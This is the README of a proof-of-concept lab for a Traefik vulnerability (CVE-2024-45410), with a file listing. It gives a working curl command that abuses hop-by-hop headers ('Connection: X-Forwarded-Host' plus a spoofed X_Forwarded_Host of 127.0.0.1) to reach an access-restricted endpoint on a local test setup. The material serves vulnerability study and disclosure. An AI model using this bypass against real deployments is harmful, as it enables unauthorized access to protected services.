A proof of concept of traefik CVE to understand the impact# Proof of Concept of CVE CVE-2024-45410
Resources: https://github.com/traefik/traefik/security/advisories/GHSA-62c8-mh53-4cqv
# How-To
Run `curl -i http://flask.localhost/protected`, you shouldn't be able to query the endpoint.
The allowed host are 127.0.0.1, let's use the following query to make a hop-by-hop header via Connection:
`curl -i http://flask.localhost/protected -H "Connection: X-Forwarded-Host" -H "X_Forwarded_Host: 127.0.0.1"`
You should be able to see the protected endpoint
[4.0K] /data/pocs/4b364d2f1501ab13ad76a1f4f05a2e1f7d6407a6
├── [ 703] backend.py
├── [ 645] docker-compose.yml
├── [ 195] Dockerfile.backend
├── [ 503] README.md
└── [ 29] requirements.txt
0 directories, 5 files